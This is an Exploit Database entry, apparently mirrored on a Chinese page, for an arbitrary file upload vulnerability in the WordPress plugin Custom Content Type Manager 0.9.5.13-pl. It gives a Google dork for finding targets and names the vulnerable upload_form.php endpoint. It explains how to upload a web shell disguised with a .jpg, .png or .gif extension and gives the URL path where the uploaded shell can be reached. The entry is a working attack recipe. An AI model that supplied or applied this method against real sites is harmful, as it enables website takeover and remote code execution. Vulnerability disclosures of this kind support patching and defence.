WordPress Plugin Custom Content Type Manager 0.9.5.13-pl – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： Adrien Thierry
  日期： 2012-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19058/

• ###########################################################
  #
  # Exploit Title: WordPress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload
  # Google Dork: inurl:wp-content/plugins/custom-content-type-manager/
  # Date: 11/06/2012
  # Exploit Author: Adrien Thierry
  # Vendor Homepage:http://www.fireproofsocks.com/
  # Software Link: http://downloads.wordpress.org/plugin/custom-content-type-manager.0.9.5.13.zip
  # Version: 0.9.5.13
  #
  ###########################################################
  
  Vuln page : http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php
  
  exploit :
  
  http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php
  
  	-> upload your shell with image ext (jpg|png|gif)
  	
  shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg
  
  #####################################################################